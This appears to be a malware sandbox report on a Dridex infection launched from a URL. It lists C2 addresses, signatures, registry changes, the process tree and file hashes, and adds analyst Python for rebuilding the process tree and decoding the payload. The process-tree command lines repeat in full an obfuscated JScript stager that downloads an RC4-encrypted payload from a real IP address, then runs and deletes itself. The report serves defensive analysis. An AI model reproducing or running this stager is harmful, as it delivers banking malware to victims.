Analysis

max time kernel: 150s
max time network: 137s
platform: windows7_x64
resource: win7v20201028
submitted: 24-01-2021 23:45
Static task: static1
URLScan task: urlscan1
Sample: http://zeroexit.xyz/9HJDckdsvfsdefvs34
General

Malware Config

Extracted
Family: dridex
Botnet: 10111
C2:
- 162.241.44.26:9443
- 185.184.25.234:4664
- 138.201.138.91:3389
Signatures

YARA rule matches on the dropped file (resource -> rule)
- \Users\Admin\AppData\Local\Temp\k5yuz.exe -> cryptone
- C:\Users\Admin\AppData\Local\Temp\k5yuz.exe -> cryptone
- \Users\Admin\AppData\Local\Temp\k5yuz.exe -> cryptone
- C:\Users\Admin\AppData\Local\Temp\k5yuz.exe -> cryptone

YARA rule matches in memory (resource -> rule), both on the image of k5yuz.exe (PID 1656) at 0x400000:
- behavioral1/memory/1656-67-0x0000000000400000-0x000000000043D000-memory.dmp -> dridex_ldr
- behavioral1/memory/1656-71-0x0000000000400000-0x000000000043D000-memory.dmp -> dridex_ldr
Blocklisted process makes network request (2 IoCs)
flow  pid   process
13    1640  wscript.exe
14    1108  wscript.exe

Executes dropped EXE (1 IoCs)
pid   process
1656  k5yuz.exe

Loads dropped DLL (2 IoCs)
pid   process
676   cmd.exe
676   cmd.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks whether UAC is enabled (1 TTPs)
description        ioc                                                                                    process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  k5yuz.exe

Modifies Internet Explorer settings (1 TTPs)
All keys below are under \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer, written as IE\ here.
- Key created: IE\GPU (iexplore.exe)
- Key created: IE\LowRegistry\DontShowMeThisDialogAgain (iexplore.exe)
- Set value (int): IE\Recovery\AdminActive\{61562AF1-5EA6-11EB-AA5C-E6A19248D3FE} = "0" (iexplore.exe)
- Key created: IE\DomainSuggestion\FileNames (iexplore.exe)
- Set value (int): IE\DomainSuggestion\NextUpdateDate = "318300403" (iexplore.exe)
- Key created: IE\Main\WindowsSearch (iexplore.exe)
- Key created: IE\DomainSuggestion (iexplore.exe)
- Key created: IE\Main (iexplore.exe)
- Key created: IE\LowRegistry\DOMStorage (iexplore.exe)
- Key created: IE\Recovery\AdminActive (iexplore.exe)
- Set value (data): IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 (iexplore.exe)
- Key created: IE\Recovery\PendingRecovery (iexplore.exe)
- Key created: IE\Main (IEXPLORE.EXE)
- Key created: IE\Zoom (iexplore.exe)
- Set value (int): IE\Main\CompatibilityFlags = "0" (iexplore.exe)
- Set value (int): IE\TabbedBrowsing\NTPFirstRun = "1" (iexplore.exe)
- Set value (str): IE\DomainSuggestion\FileNames\en-US = "en-US.1" (iexplore.exe)
- Key created: IE\IntelliForms (iexplore.exe)
- Key created: IE\PageSetup (iexplore.exe)
- Key created: IE\Toolbar (iexplore.exe)
- Key created: IE\Main (IEXPLORE.EXE)
- Key created: IE\TabbedBrowsing\NewTabPage (iexplore.exe)
- Set value (data): IE\TabbedBrowsing\NewTabPage\MFV = (value not present in this copy of the report) (iexplore.exe)
- Key created: IE\DomainSuggestion\FileNames\ (iexplore.exe)
- Key created: IE\BrowserEmulation\LowMic (iexplore.exe)
- Key created: IE\IETld\LowMic (iexplore.exe)
- Key created: IE\InternetRegistry (iexplore.exe)
- Set value (str): IE\Main\WindowsSearch\Version = "WS not running" (iexplore.exe)
- Key created: IE\Main (IEXPLORE.EXE)
- Key created: IE\TabbedBrowsing (iexplore.exe)
- Key created: IE\LowRegistry (iexplore.exe)
- Key created: IE\Toolbar\WebBrowser (iexplore.exe)
- Set value (str): IE\Main\FullScreen = "no" (iexplore.exe)
- Set value (data): IE\TabbedBrowsing\NewTabPage\LastProcessed = a056b03eb3f2d601 (iexplore.exe)
- Set value (int): IE\Recovery\PendingRecovery\AdminActive = "0" (iexplore.exe)
- Set value (data): IE\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000987e037d9d29f9a8ed3c70ff71dd3a482278536b641909506c3977cd8be8de42000000000e800000000200002000000038294b6dbe5d9108dfebf5a87c436ccb61acbed07b6fe513848952b851d1c0f02000000075819e95bc38a6128cbe74179a8b0b33efea36afaa94187f192c08784b1302da40000000c04c4b1e3103d670b4c3d1fc5a116de2968e5b981f11d3429c516207893234137e8c56a0ddd37c81dd63e7b86a4d1a56cd48e804ec959a77a3afade3b144caca (iexplore.exe)
Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid   process
1868  PowerShell.exe
1188  PowerShell.exe
1188  PowerShell.exe
1868  PowerShell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description              pid   process
Token: SeDebugPrivilege  1868  PowerShell.exe
Token: SeDebugPrivilege  1188  PowerShell.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
pid  process
892  iexplore.exe

Suspicious use of SetWindowsHookEx (10 IoCs)
pid   process
892   iexplore.exe (listed twice)
1328  IEXPLORE.EXE (listed twice)
1492  IEXPLORE.EXE (listed twice)
1312  IEXPLORE.EXE (listed four times)

Suspicious use of WriteProcessMemory (44 IoCs)
The report records each parent/target pair four times; the 11 distinct pairs are:
parent pid  parent process  target pid  target process
892         iexplore.exe    1328        IEXPLORE.EXE
1328        IEXPLORE.EXE    1188        PowerShell.exe
892         iexplore.exe    1492        IEXPLORE.EXE
1492        IEXPLORE.EXE    1868        PowerShell.exe
892         iexplore.exe    1312        IEXPLORE.EXE
1868        PowerShell.exe  1992        cmd.exe
1992        cmd.exe         1108        wscript.exe
1188        PowerShell.exe  1696        cmd.exe
1696        cmd.exe         1640        wscript.exe
1108        wscript.exe     676         cmd.exe
676         cmd.exe         1656        k5yuz.exe
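The parent/target pairs in the WriteProcessMemory signature are enough to rebuild the whole process tree and to pick out the delivery chains without the tree view. The Python below is an added example, not part of the Triage report: it parses a constructed subset of those lines (one line per pair, where the report lists each pair four times), rebuilds the tree rooted at the browser, and flags every root-to-leaf chain that starts in a browser and passes through a script host. The BROWSERS and SCRIPT_HOSTS sets are assumptions of the example, not something the report defines.

```python
"""Rebuild the process tree from "PID X wrote to memory of Y ..." lines and
flag browser -> script host delivery chains. Added example; not report code."""
import re
from collections import defaultdict

# Constructed subset of the report's WriteProcessMemory lines: one line per
# parent/target pair (the report records each pair four times).
EVENTS = """\
PID 892 wrote to memory of 1328 892 iexplore.exe IEXPLORE.EXE
PID 1328 wrote to memory of 1188 1328 IEXPLORE.EXE PowerShell.exe
PID 892 wrote to memory of 1492 892 iexplore.exe IEXPLORE.EXE
PID 1492 wrote to memory of 1868 1492 IEXPLORE.EXE PowerShell.exe
PID 892 wrote to memory of 1312 892 iexplore.exe IEXPLORE.EXE
PID 1868 wrote to memory of 1992 1868 PowerShell.exe cmd.exe
PID 1992 wrote to memory of 1108 1992 cmd.exe wscript.exe
PID 1188 wrote to memory of 1696 1188 PowerShell.exe cmd.exe
PID 1696 wrote to memory of 1640 1696 cmd.exe wscript.exe
PID 1108 wrote to memory of 676 1108 wscript.exe cmd.exe
PID 676 wrote to memory of 1656 676 cmd.exe k5yuz.exe
"""

# "PID <parent> wrote to memory of <target> <parent> <parent image> <target image>"
EDGE = re.compile(r"PID (\d+) wrote to memory of (\d+) \d+ (\S+) (\S+)")

# Assumed classification sets for the heuristic (extend to taste).
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}


def parse_edges(text):
    """Return ({pid: image}, {parent_pid: [child_pid, ...]})."""
    image, children = {}, defaultdict(list)
    for line in text.splitlines():
        m = EDGE.match(line)
        if not m:
            continue
        parent, child = int(m[1]), int(m[2])
        image.setdefault(parent, m[3])
        image[child] = m[4]
        if child not in children[parent]:        # collapse repeated pairs
            children[parent].append(child)
    return image, children


def chains(image, children, root):
    """Every root-to-leaf path as a list of (pid, image)."""
    paths = []

    def walk(pid, path):
        path = path + [(pid, image[pid])]
        kids = children.get(pid, [])
        if not kids:
            paths.append(path)
        for kid in kids:
            walk(kid, path)

    walk(root, [])
    return paths


def is_delivery_chain(chain):
    """A browser at the root and a script host anywhere below it: the browser
    handed control to wscript/PowerShell, which a page load should never do."""
    images = [img.lower() for _, img in chain]
    return images[0] in BROWSERS and any(i in SCRIPT_HOSTS for i in images[1:])


def flag(text, root):
    """All flagged chains under `root`, in tree order."""
    image, children = parse_edges(text)
    return [c for c in chains(image, children, root) if is_delivery_chain(c)]


if __name__ == "__main__":
    for chain in flag(EVENTS, 892):
        print(" -> ".join(f"{img}({pid})" for pid, img in chain))
```

Run as-is it prints the two PowerShell branches; the third branch (892 -> 1312) is a plain IE tab and is not flagged. The chain that ends in k5yuz.exe is the one whose leaf is neither a browser nor a script host, which is the branch worth pulling first in triage.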
Processes
PIDs in parentheses are taken from the signature tables above; each entry gives the image path, then the recorded command line, then the signatures hit by that process.

- C:\Program Files\Internet Explorer\iexplore.exe (PID 892)
  "C:\Program Files\Internet Explorer\iexplore.exe" http://zeroexit.xyz/9HJDckdsvfsdefvs34
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 1328)
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe (PID 1188)
      ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\cmd.exe (PID 1696)
        "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== 1
        - Suspicious use of WriteProcessMemory

        - C:\Windows\SysWOW64\wscript.exe (PID 1640)
          wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?NzIxOTE=&FieJTJh&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4fVF4Q4g4jwa2LFaL5&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz&zsqvYbgLMzk3MQ== 1
          - Blocklisted process makes network request

  - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 1492)
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:340994 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe (PID 1868)
      ((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2^&LsY^&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y^&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w^&OCANDEwOQ== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\cmd.exe (PID 1992)
        "C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2^&LsY^&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y^&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w^&OCANDEwOQ== 1
        - Suspicious use of WriteProcessMemory

        - C:\Windows\SysWOW64\wscript.exe (PID 1108)
          wsCripT //B //E:JScript 3.tMp cvbdfg http://45.138.24.35/?MTM3MTU2&LsY&oa1n4=x33QdfWYaRuPDojEM__dSqRGP0zYGViPxY2Y&s2ht4=mKrVCJ2vfzSk2bCIEBjw8VndTjvVgfdOKa1Ubge-iQeELgEOmMxZC15E9LeqzkKNzVaYsJSD-ReOaQkR_MSWE7I421n2nrJHc5kjlRKG6jBUzu5LVlMU4A4Xn_rPHqKdqUVzXEFkUgnNKponoh3BAyTqMm53sfOyQzp2mOrI9cdwwZNt1h2v9w&OCANDEwOQ== 1
          - Blocklisted process makes network request
          - Suspicious use of WriteProcessMemory

          - C:\Windows\SysWOW64\cmd.exe (PID 676)
            "C:\Windows\System32\cmd.exe" /c k5yuz.exe
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory

            - C:\Users\Admin\AppData\Local\Temp\k5yuz.exe (PID 1656)
              k5yuz.exe
              - Executes dropped EXE
              - Checks whether UAC is enabled

  - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 1312)
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:209934 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
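What the JScript echoed into 3.tMp does, read off the command line above: WScript.Arguments(0) is an RC4 key (cvbdfg), Arguments(1) is the download URL on 45.138.24.35, and Arguments(2), the trailing "1", is stored in WinHttpRequest.Option(0), which is WinHttpRequestOption_UserAgentString, so the download goes out with the header User-Agent: 1. Function _ is plain RC4 (key schedule, then keystream XOR) over responseText. The byte at offset 027 (octal, so 23) past the "PE\0\0" signature is the high byte of IMAGE_FILE_HEADER.Characteristics; IMAGE_FILE_DLL is 0x2000, so a value above 31 makes the stager save the payload as .dll and run it with regsvr32 /s, otherwise as .exe. The five-character base-36 file name comes from Math.random().toString(36).slice(-5), which is why the dropped file is k5yuz.exe. The script then deletes itself via WScript.ScriptFullName. The Python below is an added example, not code from the report or from the sandbox: it recovers the stager's arguments from a constructed copy of the cmd.exe command line (cmd's ^ escapes still in place), applies the same RC4 routine to a constructed response, and repeats the stager's DLL test beside the exact flag test. The fake PE header and the encrypted "traffic" are constructed inline.

```python
"""Analyst-side re-implementation of the 3.tMp stager's decode step.
Added example; not code from the Triage report. Sample input is constructed."""
import re
import struct

# Constructed tail of the first cmd.exe command line in the report; the echoed
# script body is shortened to a stub, the wscript arguments are the real ones.
CMDLINE = ('cmd.exe /q /c cd /d %tMp% && echo function O(l){return 1};>3.tMp && '
           'stArt wsCripT //B //E:JScript 3.tMp cvbdfg '
           'http://45.138.24.35/?NzIxOTE=^&FieJTJh^&s2ht4=RGUWVxo2bk6rPE52pZDLGpbD1DBmgqV6AH16'
           '-t_B0erZOfQe5zUawegZjlIoJBFkU9K2q30WGmxXOhJTT_xHbaAlE-5HBHLJv3Vn9mbIQdcgmxxXR62IE_O4'
           'fVF4Q4g4jwa2LFaL5^&oa1n4=xH3QMrLYbRzFFYHfLf_KRqZbNUz^&zsqvYbgLMzk3MQ== 1')

ARGS = re.compile(r"(?i)wscript\s+//B\s+//E:JScript\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)")
IMAGE_FILE_DLL = 0x2000


def cmd_unescape(s: str) -> str:
    """Undo cmd.exe's ^ escaping (^& -> &, ^< -> <, ^^ -> ^) as cmd does before echo."""
    return re.sub(r"\^(.)", r"\1", s)


def stager_args(cmdline: str) -> dict:
    """WScript.Arguments(0..2) as the stager uses them: RC4 key, URL, and the
    string it writes into WinHttpRequest.Option(0) (the User-Agent)."""
    m = ARGS.search(cmd_unescape(cmdline))
    if not m:
        raise ValueError("no wscript //E:JScript invocation in command line")
    script, key, url, ua = m.groups()
    return {"script": script, "key": key, "url": url, "user_agent": ua}


def rc4(data: bytes, key: bytes) -> bytes:
    """RC4 exactly as the stager's function _(k, e): KSA over a 256-byte S-box,
    then PRGA with the output byte XORed into each input byte."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def stager_decision(pe: bytes) -> str:
    """The stager's own test: charCodeAt(027 + indexOf('PE\\0\\0')) > 31, i.e.
    the high byte of Characteristics (PE signature + 4 + 18 = +22, high byte +23)."""
    off = pe.find(b"PE\x00\x00")
    if off < 0:
        raise ValueError("no PE signature in decrypted data")
    return "dll" if pe[off + 23] > 31 else "exe"


def characteristics_decision(pe: bytes) -> str:
    """The exact flag test. It disagrees with the stager only when a 0x1000,
    0x4000 or 0x8000 Characteristics bit is set without IMAGE_FILE_DLL."""
    off = pe.find(b"PE\x00\x00")
    if off < 0:
        raise ValueError("no PE signature in decrypted data")
    (chars,) = struct.unpack_from("<H", pe, off + 22)
    return "dll" if chars & IMAGE_FILE_DLL else "exe"


def fake_pe(characteristics: int) -> bytes:
    """Constructed minimal PE: DOS header with e_lfanew=0x40, signature, file header."""
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
    hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, characteristics)
    return dos + b"PE\x00\x00" + hdr + b"\x00" * 16


def recover_payload(cmdline: str, response: bytes):
    """Given the command line and a captured response body, return the parsed
    arguments, the decrypted payload and what the stager would have done with it."""
    args = stager_args(cmdline)
    pe = rc4(response, args["key"].encode("latin-1"))   # stager treats chars as bytes
    return args, pe, stager_decision(pe)


if __name__ == "__main__":
    wire = rc4(fake_pe(0x2102), b"cvbdfg")              # constructed DLL-flagged payload
    args, pe, kind = recover_payload(CMDLINE, wire)
    print(args["url"], "UA=" + args["user_agent"], kind)
```

For a real capture, feed the raw response body from the PCAP into recover_payload; the stager fetches over plain HTTP, so the bytes on the wire are exactly the RC4 ciphertext. The User-Agent of "1" and the wscript //B //E:JScript invocation of a .tMp file are the two cheapest things to alert on from this chain.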
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  MD5:    c14ce2d192d610b09898a1cf3ae24d02
  SHA1:   04d901c4cc0f6e84b3076d915edaae6ff63d41b6
  SHA256: 70e60a8944bd8ae0d2efdb45ecd25b45c661d5ecfccd319fd761380993ddf558
  SHA512: ab949b92ee98d73628c2c96345aeac4851796f5ce5318e50178ac575f75107ce47b1898199a5044e89935300ad584c02a757c53d43cfd53f63a571bba112bc07

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
  MD5:    02ff38ac870de39782aeee04d7b48231
  SHA1:   0390d39fa216c9b0ecdb38238304e518fb2b5095
  SHA256: fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
  SHA512: 24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
  MD5:    df44874327d79bd75e4264cb8dc01811
  SHA1:   1396b06debed65ea93c24998d244edebd3c0209d
  SHA256: 55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
  SHA512: 95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
  MD5:    75a8da7754349b38d64c87c938545b1b
  SHA1:   5c28c257d51f1c1587e29164cc03ea880c21b417
  SHA256: bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
  SHA512: 798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
  MD5:    5e3c7184a75d42dda1a83606a45001d8
  SHA1:   94ca15637721d88f30eb4b6220b805c5be0360ed
  SHA256: 8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
  SHA512: fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
  MD5:    b6d38f250ccc9003dd70efd3b778117f
  SHA1:   d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
